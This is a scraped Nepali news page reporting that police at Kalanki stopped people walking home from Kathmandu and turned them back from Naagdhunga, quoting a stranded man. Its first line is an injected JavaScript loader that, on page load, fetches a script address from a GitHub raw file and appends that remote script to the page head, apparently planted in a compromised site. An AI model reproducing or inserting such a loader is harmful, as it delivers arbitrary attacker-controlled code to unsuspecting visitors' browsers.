;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
काठमाडौँ — काठमाडौं र आसपासका विभिन्न ठाउँबाट आइतबार राति घर जान हिँडेका सर्वसाधरणहरुलाई कलंकी प्रहरीले रोकेको छ । नागढुंगासम्म पुगेका उनीहरुलाई प्रहरीले फेरि कलंकी फर्काएको हो ।
उनीहरु अहिले कलंकी चोकबाट तल रहेको चौरमा यत्तिकै बसिरहेका छन् । बर्दिया जान हिँडेका गोपालसिंह परियारले रुँदै भने, ‘सरकार घर पठाइदेउ । बसेको पालमा पानी पस्याे, खाने कुरा पनि सकियाे ।’
स्रोत : इ कान्तिपुर
फेसबुक प्रतिक्रियाहरु